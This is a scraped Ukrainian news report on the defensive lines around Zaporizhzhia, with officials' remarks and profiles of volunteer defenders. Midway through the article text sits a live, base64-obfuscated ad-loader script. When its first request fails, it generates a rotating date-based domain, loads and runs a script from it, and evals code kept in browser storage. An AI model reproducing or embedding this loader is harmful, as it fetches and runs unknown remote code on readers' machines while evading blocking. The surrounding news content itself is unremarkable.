«Пояс захисту Запоріжжя»: репортаж з лінії укріплення обласного центру (ФОТО, ВІДЕО)

Сьогодні, 17 травня, голова Запорізької військової адміністрації Олександр Старух та речник Іван Арєф’єв побували на лінії укріплень, які створено навколо Запоріжжя.

Про це повідомляє кореспондент «Акцента». Як виглядає найближча з трьох існуючих ліній до Запоріжжя дивіться у фоторепортажі нижче.

Робота над укріпленнями стартувала на початку березня. До організації долучилися керівництво області та військове командування. Всього було створено три лінії оборони. Найближча з них до Запоріжжя розташована так, щоб до міста не долітали ворожі артилеристські снаряди.

«Коли об’єдналися військові інженери разом з цивільними бульдозеристами, це дає неперевершений результат.» — говорить голова ЗОВА Олександр Старух.

Олександр Старух

Перша з трьох ліній розмежування зараз найближче до фронту, її російські війська не можуть перетнути з березня. Голова ЗОВА вважає, що дані лінії укріплень також запорука успішного майбутнього контрнаступу на запорізькому напрямку та звільнення тимчасово окупованих територій.

Лінія укріплень з висоти пташиного польоту

Кожна з ліній розрахована на атаки, які передбачають застосування важкої техніки і великокаліберної артилерії. Захисні споруди збудовані за наукою, розраховані на збереження життя військових під час обстрілів.

За словами командирів, подібні конструкції уже були апробовані в реальних бойових умовах та показали свою надійність. На позиціях підготували все необхідне – воду, провізію та амуніцію. Військове командування також підкреслює правильність розміщення захисних споруд відносно лінії фронту та цивільних об’єктів.

Вони повністю позбавляють ворога простору для маневру. Адже для просування уперед необхідно буде повністю знищити бойову точку, а для цього треба задіяти не менше сотні снарядів.

«Ці комунікації були збудовані вчасно завдяки тому, що ворог основний удар завдав на Донбасі та у Маріуполі. Саме завдяки діям наших військових на цих територіях, ми тут своєчасно збудували ці комунікаційні споруди, щоб ми були впевнені, що якщо ворог прорве оборону, ці комунікації зможуть своєчасно зайняти наші військові та давати гідну відсіч ворогу» — говорить речник ЗОВА Іван Арєф’єв.

Іван Арєф’єв var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Історіїї та побут захисників

На лінії захисту знаходяться добровольці різного віку та з різним життєвим досвідом. Їх поєднує прагнення здолати ворога та прогнати його з рідної землі.

18-річний Микита з позивним «Вовкулака» вступив до територіальної оборони Запоріжжя, коли його не прийняли на службу у рідному Кривому Розі.

За прикладом свого дядька, який з 2014 року боронить країну на Донбасі, бажав зі зброєю захищати Батьківщину. Також на цій хвилі з 14 років захопився вивченням історії і етнічних коренів свого народу, а в 16 точно вирішив, що стане військовим. Тому відразу після початку вторгнення рашистів пішов до військомату. Його не взяли до ЗСУ, бо в нього не має досвіду, він ще не служив.

Микита взяв академічну відпустку у своєму навчальному закладі, де вчився на кухаря-технолога, і потайки від рідних втік до Запоріжжя, де записався у добробати.

— Ці мій обов’язок. Це обов’язок кожного чоловіка, як мінімум того, який досяг повноліття і має повноваження взяти до рук зброю та захищати свою країну. Виховання, патріотизм, жага до захисту свого. Незалежно від того, чи людина соціаліст, чи комуніст, він має захищати своє. Я знайшов можливість, навіть коли офіційних шляхів не було – прийшов сюди, — розповів “Вовкулака”.

Микита Вовкулака

Доброволець запорізького «Азову» Сергій також боронить Запоріжжя на лінії захисту. Зазначає, що військові всим забезпечені та продовжують виконувати поставлені завдання.

Сергій

На лінії захисту є надійні бліндажі, які можуть витримувати попадання важких снарядів, є місце для надання першої медичної допомоги пораненим.

Захисники вирили для себе імпровізований холодильник в землі та продовжують щоденно удосконалювати укріплення. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/poyas-zahistu-zaporizhzhya-reportazh-z-liniyi-ukriplennya-oblasnogo-tsentru-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top